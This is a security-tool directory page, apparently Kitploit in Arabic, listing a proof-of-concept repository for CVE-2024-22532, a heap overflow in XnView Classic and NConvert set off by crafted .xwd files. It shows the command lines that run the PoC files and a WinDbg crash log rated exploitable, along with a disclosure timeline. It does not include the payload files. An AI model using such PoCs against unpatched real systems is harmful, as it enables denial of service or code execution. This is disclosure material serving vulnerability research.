Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-22532 — إثبات مفهوم لاستغلال CVE-2024-22532: تجاوز سعة المخزن المؤقت المستند إلى الكومة في XnView Classic 2.51.5 وNConvert 7.163 عبر ملف .xwd مُصمم بعناية، مما يتيح رفض الخدمة واحتمالية تنفيذ التعليمات البرمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/pwndorei/cve-2024-22532
تحليل الذاكرة الجنائيتحليل الثغرات الأمنيةالاستغلالالاختبار العشوائياستغلال الملفات الثنائية
GitHubpwndorei/cve-2024-22532

CVE-2024-22532

إثبات مفهوم لاستغلال CVE-2024-22532: تجاوز سعة المخزن المؤقت المستند إلى الكومة في XnView Classic 2.51.5 وNConvert 7.163 عبر ملف .xwd مُصمم بعناية، مما يتيح رفض الخدمة واحتمالية تنفيذ التعليمات البرمجية عن بُعد.

عرض المستودع
212منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-22532

الوصف

XnSoft XnView Classic 2.51.5 و NConvert 7.163 عرضة لتجاوز سعة المخزن المؤقت (Heap-based Buffer Overflow) عبر ملف .xwd مصمم خصيصًا

البائع

  • XnSoft

المنتجات المتأثرة

  • XnView Classic 2.51.5
  • NConvert 7.163

التأثير

  • رفض الخدمة
  • تنفيذ التعليمات البرمجية عن بُعد

إثبات المفهوم (PoC)

  • رفض الخدمة
    • سطر الأوامر المستخدم nconvert.exe -out pzl -in xwd -o .\tmp.pzl .\poc_dos.xwd
root@kitploit:~
************* Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*
Symbol search path is: srv*
Executable search path is: 
ModLoad: 00400000 006a8000   D:\BugHunting\nconvert.exe
ModLoad: 775f0000 777a1000   C:\WINDOWS\SYSTEM32\ntdll.dll
ModLoad: 6e3e0000 6e443000   C:\WINDOWS\SysWOW64\verifier.dll
ModLoad: 75b80000 75c70000   C:\WINDOWS\System32\KERNEL32.DLL
ModLoad: 752d0000 75544000   C:\WINDOWS\System32\KERNELBASE.dll
ModLoad: 77200000 773a8000   C:\WINDOWS\System32\USER32.dll
ModLoad: 76c50000 76c6a000   C:\WINDOWS\System32\win32u.dll
ModLoad: 758c0000 758e3000   C:\WINDOWS\System32\GDI32.dll
ModLoad: 75c70000 75d52000   C:\WINDOWS\System32\gdi32full.dll
ModLoad: 76d30000 76da9000   C:\WINDOWS\System32\msvcp_win.dll
ModLoad: 75650000 75762000   C:\WINDOWS\System32\ucrtbase.dll
ModLoad: 75250000 752cf000   C:\WINDOWS\System32\ADVAPI32.dll
ModLoad: 76400000 764c4000   C:\WINDOWS\System32\msvcrt.dll
ModLoad: 765a0000 76625000   C:\WINDOWS\System32\sechost.dll
ModLoad: 757e0000 757fa000   C:\WINDOWS\System32\bcrypt.dll
ModLoad: 76c70000 76d2a000   C:\WINDOWS\System32\RPCRT4.dll
ModLoad: 75d60000 763f8000   C:\WINDOWS\System32\SHELL32.dll
ModLoad: 771d0000 771f5000   C:\WINDOWS\System32\IMM32.DLL
(5fe8.2388): Access violation - code c0000005 (!!! second chance !!!)
eax=07813c00 ebx=00000000 ecx=0000fff8 edx=00010000 esi=07803c08 edi=07818000
eip=005a8eea esp=0019bb10 ebp=0019bb28 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203
nconvert+0x1a8eea:
005a8eea f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
0:000> .load D:\windbg_ext\MSEC_x86.dll
0:000> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at nconvert+0x1a8eea (Hash=0x1a1d0618.0x3b1f4010)

User mode write access violations that are not near NULL are exploitable
  • تنفيذ التعليمات البرمجية عن بُعد (فقط لـ NConvert 7.163 Windows x86)
    • لكن استدعاء الدالة CreateProcessA يفشل مع رمز الخطأ 0x8(ERROR_NOT_ENOUGH_MEMORY)
    • سطر الأوامر المستخدم nconvert.exe -out pzl -in xwd -o .\tmp.pzl .\poc_rce.xwd
    • لقطة شاشة لتسجيل TTD alt

الجدول الزمني

  • 2024.01.12 إفصاح للبائع
  • 2024.02.19 إصدار التصحيح
تنزيل الأداة